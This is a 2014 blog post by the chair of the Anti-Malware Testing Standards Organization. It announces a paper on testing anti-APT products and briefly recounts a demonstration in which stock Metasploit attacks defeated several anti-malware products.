Tuesday, 25 November 2014
When incredible claims are made by security products so should we make strong efforts to challenge and possibly validate these claims.
Over the past year and a half I have discussed testing with a range of vendors, testers and potential customers of such products. These discussions have varied from very positive to extremely defensive and illogical on the part of some vendors.
To put it this way, we have some anti-APT kit in the lab ready for such a test but equipment from one or two important vendors is elusive, to say that least.
Such testing has also been a regular point of debate at the Anti-Malware Testing Standards Organization, of which I am currently the Chair, and so two AMTSO colleagues (Richard Ford, Florida Institute of Technology and Gabor Szappanos, Sophos) joined me to write a paper called Effectively testing APT defences.
Gabor and I presented this at the AVAR 2014 conference in Sydney, on the 12th - 14th November 2014.
The paper examines some of the problems that surround testing such technologies (real and merely perceived) and questions the definition of the term "APT" in a constructive way. It also walks the reader through an example of a targeted attack and notes where certain types of testing would be deficient when using such an attack as a test case.
In the presentation, but not the paper, I also demonstrated how a 'baseline' set of tests, using unmodified Metasploit-based attacks, made mincemeat of some well-known anti-malware products. One enterprise solution stopped four out of 25 threats. We were able to obtain reverse shells in 21 cases and, just as an experiment, migrated into the anti-malware agent's own process.
This basic test demonstrated that a range of tools, tactics and techniques could be used to test different levels of protection from actors ranging from 'zero' (almost no skill/resources) to 'Neo' (effectively unlimited skills/resources).
Not every tester is capable of 'Neo' testing and some may not wish to conduct 'zero' testing, but as long as the report explains what approaches were taken and why it's hard to understand why an anti-APT vendor would object to tests that could be considered "too easy."
While the paper does not provide a single, ultimate methodology for anti-APT testing I believe that the document does outline some valid approaches, none of which are, "do not test!"